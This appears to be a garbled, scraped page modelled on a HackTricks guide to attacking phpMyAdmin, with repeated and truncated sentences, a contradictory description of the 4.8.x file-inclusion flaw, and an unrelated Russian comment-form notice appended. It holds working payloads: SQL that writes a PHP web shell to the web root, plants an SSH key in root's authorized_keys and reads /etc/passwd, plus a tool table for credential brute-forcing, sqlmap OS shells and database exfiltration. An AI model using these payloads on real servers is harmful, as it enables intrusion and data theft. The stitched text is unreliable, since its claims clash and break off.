Phpmyadmin: Hacktricks Verified

Authenticated sessions are sometimes vulnerable to file inclusion bugs that expose underlying system files.

Despite decades of warnings, default credentials remain the top entry method.

SELECT '' INTO OUTFILE '/var/www/html/shell.php'; Use code with caution.

If MySQL can load shared libraries, attacker can compile a malicious UDF to run system commands as the MySQL user.

If the version is not explicitly stated on the main login page or the dashboard footer, check the following static documentation and setup files: /README /Documentation.html /Documentation.txt /RELEASE-DATE_* /changelog.php /libraries/vendor_config.php Automated Scanning phpmyadmin hacktricks verified

Credentials are hardcoded in config.inc.php . Anyone navigating to the URL is automatically logged in. If this file is exposed or readable via Local File Inclusion (LFI), the database is entirely compromised.

A flaw in the page filtering and redirection logic allows authenticated users to include arbitrary files via the target parameter. Exploitation Steps:

SELECT "ssh-rsa AAAAB3..." INTO OUTFILE "/root/.ssh/authorized_keys";

Often, the low-privilege MySQL user has permission, allowing you to read these critical files. If MySQL can load shared libraries, attacker can

Identify the phpMyAdmin version, often found in the footer, README file, or changelog.php . Outdated versions (e.g., < 4.8.x ) often have known vulnerabilities.

SELECT LOAD_FILE('/etc/passwd');

| Tool | Use Case | |------|----------| | nmap script http-phpmyadmin-dir-enum | Detection | | sqlmap with --os-shell | Automatic RCE via SQLi (if phpMyAdmin is vulnerable to SQLi itself – rare but CVE-2016-5734 exists) | | PMA-hunt (custom script) | Brute-force default creds + version detection | | Metasploit module auxiliary/scanner/http/phpmyadmin_login | Cred brute | | mysqldump (post-auth) | Fast data exfiltration |

Create a MySQL UDF that executes system commands. If this file is exposed or readable via

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";

Before exploiting, you must identify the version and configuration. Often listed on the login page.

In phpMyAdmin 4.8.0–4.8.4, an LFI vulnerability allowed attackers to read arbitrary files without logging in.

The footer or source code of the main login page ( index.php ) often contains version strings or unique asset hashes. Directory Brute-Forcing

Не выкладывайте свой код напрямую в комментариях, он отображается некорректно. Воспользуйтесь сервисом cssdeck.com или jsfiddle.net, сохраните код и в комментариях дайте на него ссылку. Так и результат сразу увидят.